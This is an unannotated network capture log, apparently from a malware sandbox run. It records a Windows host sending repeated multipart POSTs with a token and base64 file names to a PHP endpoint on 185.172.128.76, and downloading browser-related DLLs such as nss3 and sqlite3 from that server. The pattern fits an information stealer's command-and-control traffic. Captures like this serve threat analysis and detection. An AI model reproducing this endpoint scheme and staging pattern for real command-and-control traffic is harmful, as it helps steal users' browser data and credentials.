                                                                                                                                                      Apr 27, 2024 02:19:05.498318911 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECA
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 6179
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:19:05.498320103 CEST6179OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34
                                                                                                                                                      Data Ascii: ------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                      Apr 27, 2024 02:19:06.272545099 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:05 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:19:06.275603056 CEST93OUTGET /15f649199f40275b/sqlite3.dll HTTP/1.1
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:19:06.554441929 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:06 GMT
                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                      Content-Length: 1106998
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                      ETag: "10e436-5e7ec6832a180"
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
                                                                                                                                                      Apr 27, 2024 02:19:06.554462910 CEST1289INData Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00
                                                                                                                                                      Data Ascii: @B/81s:<R@B/92P @B
                                                                                                                                                      Apr 27, 2024 02:19:06.554594994 CEST1289INData Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89
                                                                                                                                                      Data Ascii: +C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q|$D$4$*|$D$4$s|$D$4$
                                                                                                                                                      Apr 27, 2024 02:19:06.554615021 CEST1289INData Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a
                                                                                                                                                      Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
                                                                                                                                                      Apr 27, 2024 02:19:06.554635048 CEST1289INData Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75
                                                                                                                                                      Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
                                                                                                                                                      Apr 27, 2024 02:19:27.065717936 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 4599
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:19:27.377088070 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:27 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:19:27.459513903 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1451
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:19:27.767474890 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:27 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:19:27.839993954 CEST560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----ECBGIEHDBAAFIDGDAAAA
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 359
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 [TRUNCATED]
                                                                                                                                                      Data Ascii: ------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="file"------ECBGIEHDBAAFIDGDAAAA--
                                                                                                                                                      Apr 27, 2024 02:19:28.146756887 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:28 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:19:28.460273981 CEST560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 359
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 [TRUNCATED]
                                                                                                                                                      Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="file"------CGHCGIIDGDAKFIEBKFCF--
                                                                                                                                                      Apr 27, 2024 02:19:28.759814978 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:28 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:19:29.014657021 CEST93OUTGET /15f649199f40275b/freebl3.dll HTTP/1.1
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:19:29.296333075 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:29 GMT
                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                      Content-Length: 685392
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                      ETag: "a7550-5e7e950876500"
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B [TRUNCATED]
                                                                                                                                                      Apr 27, 2024 02:19:39.890960932 CEST93OUTGET /15f649199f40275b/mozglue.dll HTTP/1.1
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:19:40.173234940 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:40 GMT
                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                      Content-Length: 608080
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                      ETag: "94750-5e7e950876500"
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B [TRUNCATED]
                                                                                                                                                      Apr 27, 2024 02:19:46.210999012 CEST94OUTGET /15f649199f40275b/msvcp140.dll HTTP/1.1
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:19:46.497673988 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:46 GMT
                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                      Content-Length: 450024
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                      ETag: "6dde8-5e7e950876500"
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B [TRUNCATED]
                                                                                                                                                      Apr 27, 2024 02:19:52.055536032 CEST90OUTGET /15f649199f40275b/nss3.dll HTTP/1.1
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:19:52.333519936 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:52 GMT
                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                      Content-Length: 2046288
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                      ETag: "1f3950-5e7e950876500"
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                      Apr 27, 2024 02:20:17.765582085 CEST94OUTGET /15f649199f40275b/softokn3.dll HTTP/1.1
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:18.048156023 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:17 GMT
                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                      Content-Length: 257872
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                      ETag: "3ef50-5e7e950876500"
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B [TRUNCATED]
                                                                                                                                                      Apr 27, 2024 02:20:22.400831938 CEST98OUTGET /15f649199f40275b/vcruntime140.dll HTTP/1.1
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:22.687602043 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:22 GMT
                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                      Content-Length: 80880
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                      ETag: "13bf0-5e7e950876500"
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B [TRUNCATED]
                                                                                                                                                      Apr 27, 2024 02:20:25.492712021 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AKKEGDGCGDAKEBFIJECG
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1067
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:25.803239107 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:25 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:25.853312016 CEST468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 267
                                                                                                                                                      Connection: Keep-Alive
